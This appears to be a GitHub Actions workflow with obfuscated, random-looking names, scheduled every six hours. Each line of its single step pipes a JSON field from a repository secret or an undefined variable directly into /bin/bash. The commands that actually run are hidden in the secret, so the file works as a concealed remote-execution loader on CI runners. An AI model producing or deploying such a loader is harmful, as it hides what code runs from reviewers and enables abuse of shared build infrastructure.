name: xuzhibai3856

on:
  workflow_dispatch:
  schedule:
    - cron: '4 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xuzhibai3856
        env:
          nxgr39332: ${{ secrets.nxgr39332 }}
        run: |
          echo $nxgr39332 | jq -r .kt24882 | /bin/bash
          echo $rt41 | jq -r .lyje30 | /bin/bash
          echo $wtjq563 | jq -r .npnvq88 | /bin/bash
          echo $mtr44 | jq -r .tmv9 | /bin/bash
          echo $nha3 | jq -r .dj25682 | /bin/bash
          echo $ybdjj741 | jq -r .gmnle2126 | /bin/bash
          echo $oy6727 | jq -r .nmoi0295 | /bin/bash
          echo $lirvy3 | jq -r .am71 | /bin/bash
          echo $ydqw840 | jq -r .ssrj878 | /bin/bash
          echo $tfnc08 | jq -r .aadi48472 | /bin/bash

